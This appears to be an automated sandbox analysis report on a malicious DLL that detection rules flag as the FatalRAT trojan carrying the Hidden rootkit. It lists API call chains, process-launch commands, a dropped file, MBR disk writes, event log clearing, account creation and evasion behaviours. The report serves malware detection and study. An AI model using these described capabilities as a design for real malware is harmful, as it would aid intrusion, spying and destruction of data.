                  Source: 3.2.rundll32.exe.10000000.0.unpack, type: UNPACKEDPE Matched rule: INDICATOR_TOOL_RTK_HiddenRootKit author = ditekSHen, description = Detects the Hidden public rootkit
                  Source: 3.2.rundll32.exe.10000000.0.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_FatalRAT author = ditekSHen, description = Detects FatalRAT
                  Source: ZfJheGhddq.dll Binary string: \Device\QAssist\DosDevices\QAssistQAssist!InitializeDevice[irql:%d,pid:%d][error]: Error, device creation failed with code:%08x
                  Source: ZfJheGhddq.dll Binary string: \Device\QAssist\DosDevices\QAssist
                  Source: ZfJheGhddq.dll Binary string: \??\\Device\\SystemRoot\QAssist!CheckProtectedOperation[irql:%d,pid:%d][warning]: Warning, can't update initial state for process: %p
                  Source: ZfJheGhddq.dll Binary string: \Device\
                  Source: classification engine Classification label: mal100.bank.troj.spyw.evad.winDLL@20/1@0/0
                  Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_100290C0 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,CloseHandle,0_2_100290C0
                  Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_1001B690 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,CloseHandle,CloseHandle,0_2_1001B690
                  Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_100290C0 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,CloseHandle,3_2_100290C0
                  Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_1001B690 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,CloseHandle,CloseHandle,3_2_1001B690
                  Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_1001B250 GetTickCount,GetVersionExA,getsockname,GetSystemInfo,GlobalMemoryStatusEx,GetDriveTypeA,GetDiskFreeSpaceExA,GetDriveTypeA,GetDiskFreeSpaceExA,GetTickCount,GetTickCount,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,lstrcpyA,lstrcpyA,lstrcpyA,lstrcpyA,GetLastInputInfo,GetTickCount,_access,lstrcpyA,0_2_1001B250
                  Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_100270F0 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,0_2_100270F0
                  Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_1001A100 CoInitialize,CoCreateInstance,GetDriveTypeA,SysFreeString,SysFreeString,CoUninitialize,0_2_1001A100
                  Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_1001EFD0 Shellex,#823,lstrcpyA,lstrcpyA,lstrcpyA,lstrcpyA,lstrcpyA,lstrcpyA,lstrcpyA,lstrcpyA,lstrcpyA,lstrcpyA,lstrcpyA,lstrcpyA,GetCurrentThreadId,PostThreadMessageA,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,GetCommandLineA,CreateMutexA,GetLastError,strstr,Sleep,Sleep,OpenSCManagerA,OpenServiceA,CloseServiceHandle,StartServiceA,CloseServiceHandle,CloseServiceHandle,ExitProcess,CloseServiceHandle,CloseServiceHandle,Sleep,Sleep,sprintf,ExitProcess,sprintf,sprintf,GetModuleFileNameA,sprintf,Sleep,sprintf,ExitProcess,Sleep,Sleep,Sleep,Sleep,0_2_1001EFD0
                  Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Users\Public\Documents\MM\svchos1.exe
                  Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5060:120:WilError_03
                  Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1916:120:WilError_03
                  Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4064:120:WilError_03
                  Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1736:120:WilError_03
                  Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4940:120:WilError_03
                  Source: C:\Windows\System32\loaddll32.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                  Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\ZfJheGhddq.dll,Shellex
                  Source: ZfJheGhddq.dll ReversingLabs: Detection: 65%
                  Source: unknown Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe "C:\Users\user\Desktop\ZfJheGhddq.dll"
                  Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\ZfJheGhddq.dll",#1
                  Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\ZfJheGhddq.dll,Shellex
                  Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\ZfJheGhddq.dll",#1
                  Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md C:\Users\Public\Documents\MM
                  Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\System32\loaddll32.exe Section loaded: apphelp.dll
                  Source: C:\Windows\System32\loaddll32.exe Section loaded: mfc42.dll
                  Source: C:\Windows\System32\loaddll32.exe Section loaded: msvcp60.dll
                  Source: C:\Windows\System32\loaddll32.exe Section loaded: winmm.dll
                  Source: C:\Windows\System32\loaddll32.exe Section loaded: iphlpapi.dll
                  Source: C:\Windows\System32\loaddll32.exe Section loaded: dwmapi.dll
                  Source: C:\Windows\System32\loaddll32.exe Section loaded: wininet.dll
                  Source: C:\Windows\System32\loaddll32.exe Section loaded: netapi32.dll
                  Source: C:\Windows\System32\loaddll32.exe Section loaded: wtsapi32.dll
                  Source: C:\Windows\System32\loaddll32.exe Section loaded: samcli.dll
                  Source: C:\Windows\System32\loaddll32.exe Section loaded: netutils.dll
                  Source: C:\Windows\SysWOW64\cmd.exe Section loaded: apphelp.dll
                  Source: ZfJheGhddq.dll Static file information: File size 1269760 > 1048576
                  Source: Binary string: F:\hidden-master\x64\Debug\QAssist.pdb source: loaddll32.exe, 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmp, rundll32.exe, 00000003.00000002.4028225256.00000000100FA000.00000008.00000001.01000000.00000003.sdmp, rundll32.exe, 00000004.00000002.4028177063.00000000100FA000.00000008.00000001.01000000.00000003.sdmp, ZfJheGhddq.dll
                  Source: Binary string: rundll32.pdb source: rundll32.exe, 00000003.00000002.4027805864.00000000027FA000.00000004.00000020.00020000.00000000.sdmp, svchos1.exe.3.dr
                  Source: Binary string: rundll32.pdbGCTL source: rundll32.exe, 00000003.00000002.4027805864.00000000027FA000.00000004.00000020.00020000.00000000.sdmp, svchos1.exe.3.dr
                  Source: Binary string: F:\hidden-master\Debug\QAssist.pdb source: loaddll32.exe, 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmp, rundll32.exe, 00000003.00000002.4028225256.00000000100FA000.00000008.00000001.01000000.00000003.sdmp, rundll32.exe, 00000004.00000002.4028177063.00000000100FA000.00000008.00000001.01000000.00000003.sdmp, ZfJheGhddq.dll
                  Source: svchos1.exe.3.dr Static PE information: 0x6A8F1B39 [Wed Aug 26 16:58:33 2026 UTC]
                  Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_10014700 LoadLibraryA,GetProcAddress,#823,#823,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,strchr,strncat,strncat,strncat,strchr,RegQueryValueExA,wsprintfA,RegQueryValueExA,strchr,RegEnumKeyExA,wsprintfA,wsprintfA,RegEnumValueA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,lstrcatA,#825,#825,0_2_10014700
                  Source: ZfJheGhddq.dll Static PE information: section name: .rodata
                  Source: ZfJheGhddq.dll Static PE information: section name: .rotext
                  Source: svchos1.exe.3.dr Static PE information: section name: .didat
                  Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_1002D080 push eax; ret 0_2_1002D0AE
                  Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_1002D080 push eax; ret 3_2_1002D0AE

                  Persistence and Installation Behavior

                  Source: C:\Windows\System32\loaddll32.exe Code function: CreateFileA,DeviceIoControl,DeviceIoControl,WriteFile,DeviceIoControl,CloseHandle,Sleep,GetVersion,ExitWindowsEx,ExitProcess, \\.\PHYSICALDRIVE0 0_2_1000E670
                  Source: C:\Windows\SysWOW64\rundll32.exe Code function: CreateFileA,DeviceIoControl,DeviceIoControl,WriteFile,DeviceIoControl,CloseHandle,Sleep,GetVersion,ExitWindowsEx,ExitProcess, \\.\PHYSICALDRIVE0 3_2_1000E670
                  Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_10025AA0 lstrlenA,lstrlenA,lstrlenA,lstrlenA,NetUserAdd,#825,#825,wcscpy,#825,#825,NetLocalGroupAddMembers,#825,LocalFree,0_2_10025AA0
                  Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Users\Public\Documents\MM\svchos1.exe

                  Boot Survival

                  Source: C:\Windows\System32\loaddll32.exe Code function: CreateFileA,DeviceIoControl,DeviceIoControl,WriteFile,DeviceIoControl,CloseHandle,Sleep,GetVersion,ExitWindowsEx,ExitProcess, \\.\PHYSICALDRIVE0 0_2_1000E670
                  Source: C:\Windows\SysWOW64\rundll32.exe Code function: CreateFileA,DeviceIoControl,DeviceIoControl,WriteFile,DeviceIoControl,CloseHandle,Sleep,GetVersion,ExitWindowsEx,ExitProcess, \\.\PHYSICALDRIVE0 3_2_1000E670
                  Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_1001EFD0 Shellex,#823,lstrcpyA,lstrcpyA,lstrcpyA,lstrcpyA,lstrcpyA,lstrcpyA,lstrcpyA,lstrcpyA,lstrcpyA,lstrcpyA,lstrcpyA,lstrcpyA,GetCurrentThreadId,PostThreadMessageA,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,GetCommandLineA,CreateMutexA,GetLastError,strstr,Sleep,Sleep,OpenSCManagerA,OpenServiceA,CloseServiceHandle,StartServiceA,CloseServiceHandle,CloseServiceHandle,ExitProcess,CloseServiceHandle,CloseServiceHandle,Sleep,Sleep,sprintf,ExitProcess,sprintf,sprintf,GetModuleFileNameA,sprintf,Sleep,sprintf,ExitProcess,Sleep,Sleep,Sleep,Sleep,0_2_1001EFD0
                  Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_1001D150 IsWindowVisible,IsIconic,GetWindowTextA,strstr,strstr,strstr,strstr,strstr,strstr,strstr,strstr,strstr,strstr,strstr,strstr,strstr,strstr,strstr,strstr,strstr,strstr,strstr,strstr,strstr,strstr,0_2_1001D150
                  Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_1001D150 IsWindowVisible,IsIconic,GetWindowTextA,strstr,strstr,strstr,strstr,strstr,strstr,strstr,strstr,strstr,strstr,strstr,strstr,strstr,strstr,strstr,strstr,strstr,strstr,strstr,strstr,strstr,strstr,3_2_1001D150
                  Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_1000E540 OpenEventLogA,ClearEventLogA,OpenEventLogA,ClearEventLogA,CloseEventLog,0_2_1000E540
                  Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_10001140 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,#825,#825,#825,#825,0_2_10001140
                  Source: C:\Windows\System32\loaddll32.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\loaddll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                  Malware Analysis System Evasion

Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_1001D4A0
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_1001DA70
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_1001D4A0
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_1001DA70
Source: C:\Windows\System32\loaddll32.exe | Evasive API call chain: CreateMutex,DecisionNodes,Sleep
Source: C:\Windows\SysWOW64\rundll32.exe | Evasive API call chain: CreateMutex,DecisionNodes,Sleep
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_10019930 | LocalAlloc,LocalAlloc,OpenSCManagerA,EnumServicesStatusA,EnumServicesStatusA,LocalAlloc,EnumServicesStatusA,lstrlenA,OpenServiceA,QueryServiceConfigA,LocalAlloc,QueryServiceConfigA,QueryServiceConfig2A,LocalAlloc,QueryServiceConfig2A,lstrcatA,lstrcatA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,LocalSize,LocalReAlloc,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,LocalFree,LocalFree,LocalFree,CloseServiceHandle,LocalFree,CloseServiceHandle,LocalReAlloc
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_10019930 | LocalAlloc,LocalAlloc,OpenSCManagerA,EnumServicesStatusA,EnumServicesStatusA,LocalAlloc,EnumServicesStatusA,lstrlenA,OpenServiceA,QueryServiceConfigA,LocalAlloc,QueryServiceConfigA,QueryServiceConfig2A,LocalAlloc,QueryServiceConfig2A,lstrcatA,lstrcatA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,LocalSize,LocalReAlloc,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,LocalFree,LocalFree,LocalFree,CloseServiceHandle,LocalFree,CloseServiceHandle,LocalReAlloc
Source: C:\Windows\System32\loaddll32.exe | Decision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)
Source: C:\Windows\System32\loaddll32.exe | API coverage: 2.3 %
Source: C:\Windows\SysWOW64\rundll32.exe | API coverage: 2.5 %
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_1001DA70
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_1001DA70
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed (4 occurrences)
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_10009080 | lstrlenA,wsprintfA,FindFirstFileA,LocalAlloc,LocalReAlloc,lstrlenA,FindNextFileA,LocalFree,FindClose
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_100092A0 | lstrlenA,wsprintfA,wsprintfA,FindFirstFileA,wsprintfA,wsprintfA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_100097D0 | lstrlenA,wsprintfA,wsprintfA,FindFirstFileA,wsprintfA,wsprintfA,?_Grow@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAE_NI_N@Z,#823,#825,wsprintfA,FindNextFileA,FindClose
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_1002AB10 | lstrcatA,lstrcatA,lstrcatA,FindFirstFileA,GetPrivateProfileStringA,lstrlenA,strstr,GetPrivateProfileStringA,lstrlenA,lstrlenA,LocalSize,LocalReAlloc,lstrlenA,lstrlenA,lstrlenA,lstrlenA,FindNextFileA,FindClose
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_10009B60 | FindFirstFileA,FindClose,FindClose
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_10009C40 | FindFirstFileA,FindClose,CloseHandle,CreateFileA
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_1000BD50 | ?_Tidy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEX_N@Z,?_Grow@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAE_NI_N@Z,?_Eos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEXI@Z,?_Xran@std@@YAXXZ,?_Freeze@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEXXZ,?append@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ID@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,?_C@?1??_Nullstr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@CAPBDXZ@4DB,?_C@?1??_Nullstr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@CAPBDXZ@4DB,FindFirstFileA,?_Tidy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEX_N@Z,?_Tidy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEX_N@Z,_strcmpi,DeleteFileA,_strcmpi,_strcmpi,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,?_C@?1??_Nullstr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@CAPBDXZ@4DB,?_C@?1??_Nullstr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@CAPBDXZ@4DB,#825,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,?_C@?1??_Nullstr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@CAPBDXZ@4DB,?_C@?1??_Nullstr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@CAPBDXZ@4DB,DeleteFileA,#825,FindNextFileA,FindClose,RemoveDirectoryA,#825
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_10009080 | lstrlenA,wsprintfA,FindFirstFileA,LocalAlloc,LocalReAlloc,lstrlenA,FindNextFileA,LocalFree,FindClose
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_100092A0 | lstrlenA,wsprintfA,wsprintfA,FindFirstFileA,wsprintfA,wsprintfA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_100097D0 | lstrlenA,wsprintfA,wsprintfA,FindFirstFileA,wsprintfA,wsprintfA,?_Grow@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAE_NI_N@Z,#823,#825,wsprintfA,FindNextFileA,FindClose
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_1002AB10 | lstrcatA,lstrcatA,lstrcatA,FindFirstFileA,GetPrivateProfileStringA,lstrlenA,strstr,GetPrivateProfileStringA,lstrlenA,lstrlenA,LocalSize,LocalReAlloc,lstrlenA,lstrlenA,lstrlenA,lstrlenA,FindNextFileA,FindClose
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_10009B60 | FindFirstFileA,FindClose,FindClose
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_10009C40 | FindFirstFileA,FindClose,CloseHandle,CreateFileA
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_1000BD50 | ?_Tidy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEX_N@Z,?_Grow@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAE_NI_N@Z,?_Eos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEXI@Z,?_Xran@std@@YAXXZ,?_Freeze@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEXXZ,?append@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ID@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,?_C@?1??_Nullstr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@CAPBDXZ@4DB,?_C@?1??_Nullstr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@CAPBDXZ@4DB,FindFirstFileA,?_Tidy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEX_N@Z,?_Tidy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEX_N@Z,_strcmpi,DeleteFileA,_strcmpi,_strcmpi,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,?_C@?1??_Nullstr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@CAPBDXZ@4DB,?_C@?1??_Nullstr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@CAPBDXZ@4DB,#825,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,?_C@?1??_Nullstr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@CAPBDXZ@4DB,?_C@?1??_Nullstr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@CAPBDXZ@4DB,DeleteFileA,#825,FindNextFileA,FindClose,RemoveDirectoryA,#825
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_10008E50 | GetLogicalDriveStringsA,GetUserNameA,_strcmpi,SHGetFolderPathA,CloseHandle,lstrlenA,lstrlenA,lstrlenA,GetVolumeInformationA,SHGetFileInfoA,lstrlenA,lstrlenA,GetDiskFreeSpaceExA,GetDriveTypeA,lstrlenA
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_1001B250 | GetTickCount,GetVersionExA,getsockname,GetSystemInfo,GlobalMemoryStatusEx,GetDriveTypeA,GetDiskFreeSpaceExA,GetDriveTypeA,GetDiskFreeSpaceExA,GetTickCount,GetTickCount,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,lstrcpyA,lstrcpyA,lstrcpyA,lstrcpyA,GetLastInputInfo,GetTickCount,_access,lstrcpyA
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_100174C0 | BlockInput,BlockInput,BlockInput
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_10014700 | LoadLibraryA,GetProcAddress,#823,#823,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,strchr,strncat,strncat,strncat,strchr,RegQueryValueExA,wsprintfA,RegQueryValueExA,strchr,RegEnumKeyExA,wsprintfA,wsprintfA,RegEnumValueA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,lstrcatA,#825,#825
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_1000A580 | LocalAlloc,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcessHeap,GetProcessHeap,CreateToolhelp32Snapshot,lstrlenA,htons,inet_ntoa,wsprintfA,wsprintfA,htons,inet_ntoa,wsprintfA,lstrcpyA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,LocalSize,LocalReAlloc,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,GetProcessHeap,GetProcAddress,GetProcAddress,GetProcessHeap,GetProcessHeap,HeapFree,FreeLibrary,htons,inet_ntoa,wsprintfA,lstrcpyA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,LocalSize,LocalReAlloc,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,GetProcessHeap,GetProcessHeap,GetProcessHeap,CreateToolhelp32Snapshot,lstrlenA,htons,inet_ntoa,wsprintfA,wsprintfA,htons,inet_ntoa,wsprintfA,lstrcpyA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,LocalSize,LocalReAlloc,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,htons,inet_ntoa,wsprintfA,lstrcpyA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,LocalSize,LocalReAlloc,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,CloseHandle,LocalFree,LocalFree,LocalFree,FreeLibrary,LocalReAlloc

                  HIPS / PFW / Operating System Protection Evasion

Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_1000E780 | SetEvent,FindWindowA,ShowWindow,FindWindowA,ShowWindow,FindWindowA,FindWindowA,ShowWindow,ShowWindow,FindWindowA,ShowWindow,FindWindowA,FindWindowA,ShowWindow,ShowWindow,FindWindowA,ShowWindow,FindWindowA,SendMessageA,FindWindowA,SendMessageA,mciSendStringA,mciSendStringA,Beep,Sleep,Beep,Sleep,GetForegroundWindow,Beep,Sleep,MoveWindow,GetWindowRect,MoveWindow,Sleep,MoveWindow,Sleep,Beep,SwapMouseButton,SwapMouseButton
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_1000E780 | SetEvent,FindWindowA,ShowWindow,FindWindowA,ShowWindow,FindWindowA,FindWindowA,ShowWindow,ShowWindow,FindWindowA,ShowWindow,FindWindowA,FindWindowA,ShowWindow,ShowWindow,FindWindowA,ShowWindow,FindWindowA,SendMessageA,FindWindowA,SendMessageA,mciSendStringA,mciSendStringA,Beep,Sleep,Beep,Sleep,GetForegroundWindow,Beep,Sleep,MoveWindow,GetWindowRect,MoveWindow,Sleep,MoveWindow,Sleep,Beep,SwapMouseButton,SwapMouseButton
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_1000ED10 | CreateToolhelp32Snapshot,Process32First,_strcmpi,OpenProcess,TerminateProcess,_strcmpi,OpenProcess,TerminateProcess,Process32Next,CloseHandle, explorer.exe
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_1000ED10 | CreateToolhelp32Snapshot,Process32First,_strcmpi,OpenProcess,TerminateProcess,_strcmpi,OpenProcess,TerminateProcess,Process32Next,CloseHandle, explorer.exe
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_10021410 | _access,GetModuleFileNameA,ShellExecuteExA,ShellExecuteExA,GetLastError,exit,_access,_access,Sleep,WinExec,WinExec,_access,WinExec,Sleep,_access,Sleep,CreateThread,CreateThread,CloseHandle,CloseHandle,CreateThread,CloseHandle,Shellex
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\ZfJheGhddq.dll",#1
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_1001EFD0 | Shellex,#823,lstrcpyA,lstrcpyA,lstrcpyA,lstrcpyA,lstrcpyA,lstrcpyA,lstrcpyA,lstrcpyA,lstrcpyA,lstrcpyA,lstrcpyA,lstrcpyA,GetCurrentThreadId,PostThreadMessageA,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,GetCommandLineA,CreateMutexA,GetLastError,strstr,Sleep,Sleep,OpenSCManagerA,OpenServiceA,CloseServiceHandle,StartServiceA,CloseServiceHandle,CloseServiceHandle,ExitProcess,CloseServiceHandle,CloseServiceHandle,Sleep,Sleep,sprintf,ExitProcess,sprintf,sprintf,GetModuleFileNameA,sprintf,Sleep,sprintf,ExitProcess,Sleep,Sleep,Sleep,Sleep
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_100209D0 | AllocateAndInitializeSid,CheckTokenMembership,FreeSid
Source: loaddll32.exe, loaddll32.exe, 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmp, rundll32.exe, rundll32.exe, 00000003.00000002.4028225256.00000000100FA000.00000008.00000001.01000000.00000003.sdmp, rundll32.exe, 00000004.00000002.4028177063.00000000100FA000.00000008.00000001.01000000.00000003.sdmp | Binary or memory string: Shell_TrayWnd
